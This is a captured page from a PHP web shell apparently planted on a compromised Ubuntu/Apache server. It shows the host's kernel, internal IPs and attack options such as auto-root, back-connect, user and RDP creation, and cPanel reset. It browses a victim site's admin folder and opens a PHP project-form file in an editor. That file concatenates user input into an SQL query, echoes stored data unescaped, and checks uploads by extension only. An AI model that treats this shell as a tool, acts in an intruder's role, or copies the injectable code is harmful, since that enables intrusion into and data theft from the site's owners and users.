Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
caiold1 /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-x--x
css
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
uploadDoc
[ DIR ]
drwxr-x--x
changePassword.php
3.99
KB
-rwxr-x--x
class.admin.php
4.39
KB
-rwxr-x--x
common.php
5.6
KB
-rwxr-x--x
common_old07032022.php
5.4
KB
-rwxr-x--x
dashboard.php
8.35
KB
-rwxr-x--x
dashboard_old07032022.php
7.37
KB
-rwxr-x--x
dbconfig.php
1.22
KB
-rwxr-x--x
editImage.php
2.18
KB
-rwxr-x--x
fpass.php
3.07
KB
-rwxr-x--x
index.php
4
KB
-rwxr-x--x
logout.php
624
B
-rwxr-x--x
password.php
3.51
KB
-rwxr-x--x
projectDetails.php
9.7
KB
-rwxr-x--x
projectDetailsEdit.php
9.02
KB
-rwxr-x--x
projectDetailsEdit_old07032022...
8.63
KB
-rwxr-x--x
projectDetails_old07032022.php
9.16
KB
-rwxr-x--x
publicationEdit.php
9.6
KB
-rwxr-x--x
publicationEdit_old07032022.ph...
8.62
KB
-rwxr-x--x
register.php
5.57
KB
-rwxr-x--x
resetpass.php
5.26
KB
-rwxr-x--x
vacanciesEdit.php
9.19
KB
-rwxr-x--x
vaccancy.php
8.17
KB
-rwxr-x--x
verifyLink.php
10.13
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : projectDetails_old07032022.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; $tokenAuth = $row[ 'authtokenid' ]; require_once 'common.php'; $projectV = new CAIWEB(); if ( isset( $_POST[ 'btn-submit' ] ) ) { $projectTitle = trim( $_POST[ 'projectTitle' ] ); $fundingAgency = trim( $_POST[ 'fundingAgency' ] ); $startDate = trim( $_POST[ 'startDate' ] ); $endDate = trim( $_POST[ 'endDate' ] ); $description = trim( $_POST[ 'description' ] ); $piDetails = trim( $_POST[ 'piDetails' ] ); $status=2; //Upload Documents----------------- $pImg = $_FILES[ 'pImg' ][ 'name' ]; if ( $pImg != '' ) { $ext4 = pathinfo( $pImg, PATHINFO_EXTENSION ); $allowed4 = array( 'jpg', 'jpeg', 'png' ); //check if file type is valid if ( in_array( $ext4, $allowed4 ) ) { $pImg = '1' .'-' . $fundingAgency . '-' . $pImg; //set target directory $path4 = 'uploadDoc/'; // $created = @date('Y-m-d H:i:s'); move_uploaded_file( $_FILES[ 'pImg' ][ 'tmp_name' ], ( $path4 . $pImg ) ); } } if ( empty( $projectTitle ) ) { $errMSG = "Please enter project Title."; } else if ( empty( $fundingAgency ) ) { $errMSG = "Please enter Funding Agency"; } else if ( empty( $startDate ) ) { $errMSG = "Please enter start date"; } if ( !isset( $errMSG ) ) { $stmt = $projectV->runQuery("SELECT * FROM projectdetails WHERE projectTitle=:projectTitle1 and fundingAgency='$fundingAgency'"); $stmt->execute(array(":projectTitle1"=>$projectTitle)); $rows = $stmt->fetch(PDO::FETCH_ASSOC); if($stmt->rowCount() > 0) { $errMSG = "You have already submited."; } else { if ( $projectV->projectD( $projectTitle, $startDate,$endDate, $description,$fundingAgency,$piDetails,$pImg,$status ) ) { $successMSG = "Project details has been submited successfuly.."; } else { $errMSG = "sorry , Query could not execute..."; } } } } ?> <style> .displayImg{ width: 200px; } </style> <div id="layoutSidenav_content"> <main> <div class="container-fluid px-4 "> <h2 class="mt-4 mb-4">Project</h2> <div class="row"> <div class="col-xl-12"> <div class="card mb-4"> <div class="card-header"> Project details Form </div> <div class="card-body"> <form id="tutionFee" name="tutionFee" action="projectDetails.php?authToken=<?php echo $tokenAuth;?>" method="post" enctype="multipart/form-data" > <div class="row"> <div class="box-body"> <?php if ( isset( $errMSG ) ) { ?> <div class="alert alert-warning alert-dismissible fade show" role="alert"> <?php echo $errMSG; ?> <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div> <?php } else if ( isset( $successMSG ) ) { ?> <div class="alert alert-success alert-dismissible fade show" role="alert"> <?php echo $successMSG; ?> <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div> <?php } ?> </div> <div class="mb-3 col-md-3"> <label for="exampleFormControlInput1" class="form-label">Project Title</label> <input type="text" name="projectTitle" required class="form-control"> </div> <div class="mb-3 col-md-3"> <label for="address" class="form-label">Funding Agency</label> <input type="text" name="fundingAgency" required class="form-control"> </div> <div class="mb-3 col-md-3"> <label for="startDate" class="form-label">Start Date</label> <input type="date" name="startDate" required class="form-control"> </div> <div class="mb-3 col-md-3"> <label for="endDate" class="form-label">End Date</label> <input type="date" name="endDate" required class="form-control"> </div> <div class="mb-3 col-md-12"> <label for="exampleFormControlTextarea1" class="form-label">Project Details</label> <textarea class="form-control" name="description" id="exampleFormControlTextarea1" rows="3"></textarea> </div> <div class="mb-3 col-md-3"> <label for="exampleFormControlTextarea1" class="form-label">Project Image</label> <input type="file" name="pImg" id="profile-img" class="form-control" onchange="preview()"> <p class="help-block" style="font-size: 14px;">Only jpeg, jpg, png and tiff can be uploaded</p> <p style="clear: both;"></p> <p> <img id="frame" class="displayImg" /></p> </div> <div class="mb-3 col-md-3"> <label for="exampleFormControlTextarea1" class="form-label">PI Details</label> <input type="text" name="piDetails" required class="form-control"> </div> </div> <div class="mb-3"> <input type="submit" class="btn btn-primary btn-sm" value="Submit" name="btn-submit"> </div> </form> </div> </div> </div> <div class="card mb-4"> <div class="card-header"> <i class="fas fa-table me-1"></i> Vaccancy Details </div> <div class="card-body"> <table id="datatablesSimple"> <thead> <tr> <th>Images</th> <th>Project Title</th> <th>Start Date</th> <th>End Date</th> <th>Description</th> <th>Funding Agency</th> <th>PI Details</th> <th>Status</th> <th>Action</th> </tr> </thead> <tfoot> <tr> <th>Images</th> <th>Project Title</th> <th>Start Date</th> <th>End Date</th> <th>Description</th> <th>Funding Agency</th> <th>PI Details</th> <th>Status</th> <th>Action</th> </tr> </tfoot> <tbody> <?php $result = $DB_con->prepare("SELECT * FROM projectdetails order by makerstamp desc "); $result->execute(); for($i=0; $row = $result->fetch(); $i++){ $vID = $row ['pID']; ?> <tr> <td> <?php $prImg = $row ['pImg']; if($prImg<>""){?> <img src="uploadDoc/<?php echo $row ['pImg']; ?>" style="width: 65px;"> <?php } else { ?> <img src="uploadDoc/project.jpg" style="width: 65px;"> <?php } ?> <a data-bs-toggle="modal" data-bs-target="#imgid_<?php echo $row['pID']; ?>"><i class="fas fa-edit"></i></a></td> <td><?php echo $row ['projectTitle']; ?></td> <td><?php echo $row ['startDate']; ?></td> <td><?php echo $row ['endDate']; ?></td> <td><?php echo $row ['description']; ?></td> <td><?php echo $row ['fundingAgency']; ?></td> <td><?php echo $row ['piDetails']; ?></td> <td><?php $status = $row ['status']; if($status =='2'){ ?> Active <?php } else { ?> Disable <?php } ?> </td> <td><a href="projectDetailsEdit.php?vID=<?php echo $vID; ?>&authToken=<?php echo $tokenAuth;?>">Edit</a></td> </tr> <?php include('editImage.php'); } ?> </tbody> </table> </div> </div> </div> </div> <!-- Modal --> </main> <script type="text/javascript"> function preview() { frame.src=URL.createObjectURL(event.target.files[0]); } </script> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close